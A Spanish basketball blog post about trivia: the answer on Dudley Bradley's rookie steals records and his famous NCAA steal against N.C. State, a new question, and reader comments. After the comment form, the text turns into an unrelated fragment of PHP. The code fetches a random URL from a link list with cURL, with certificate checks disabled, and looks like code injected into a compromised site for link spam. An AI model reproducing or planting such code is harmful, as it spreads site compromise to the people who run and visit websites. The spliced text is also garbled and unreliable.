Trivial #17: Dudley Bradley, el Secretario de la Defensa

08 de November de 2009 por txusma

Aceptamos que la pregunta era un poco embarullada y no era fácil de entender a la primera pero nada de eso fue obstáculo para que nuestro amigo Sergio acabara adivinando el nombre del jugador que buscábamos: Dudley Bradley.

Bradley fue escogido en la posición 13 del draft de 1979 (el de Magic Johnson) por los Indiana Pacers y jugó en la NBA 9 temporadas con unas medias de 5.2 puntos, 1.8 rebotes y 1.9 asistencias. Si no profundizáramos más nos quedaria la sensación de que fue un auténtico Don Nadie de la liga pero nada más lejos de la realidad. Bradley puede presumir de tener más de un récord en la selecta NBA. Efectivamente, Dudley Bradley tiene el honor de ser el jugador que más balones ha robado en su año rookie en total (211) y de media (2.57) y también es uno de los pocos jugadores capaces de robar 8 balones en una sola parte. Sin duda un auténtico “ladrón”.

Pero más que su carrera en la NBA, Bradley se hizo famoso por una de las jugadas más memorables de la historia de la NCAA. Con los Tar Heels (su equipo) perdiendo de un punto a falta de 10 segundos frente a N.C. State (los grandes rivales), robó el balón de manos del base rival y machacó la canasta contraria dando la victoria a su equipo 70-69. En aquella época era conocido como “El Secretario de la Defensa”.

Una pregunta más:

Hubo una vez un jugador capaz de romper 2 tableros en 2 partidos diferentes separados tan solo por 23 días. Este jugador es líder histórico en una categoría estadística en la que no aparece, curiosamente, ningún Hall of Fame entre los 10 primeros. ¿A qué equipo de la WNBA entrenó el primer Hall of Fame de la lista?

Comenta

3 comentarios a esta entrada

  1. sergio dice:
    #1

    Veamos… lo de los 2 mates en 23 dias si que lo sabia: Darryl Hawkins
    Lo que no sabia es que era el lider historico en faltas cometidas en un año: 386 (cosa normal en una bestia como el tito Darryl). El primer Hall of Famer de la lista es Dave Cowens (ex Boston-Celtics y 2 anillos) en el puesto 14 y estuvo entrenando a las Chicago Sky en 2006

      Citar

  2. Txusma dice:
    #2

    Yo contigo no juego más… :p 😀

      Citar

  3. Iñaki Garcia dice:
    #3

    No hace falta que me digas nada más xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>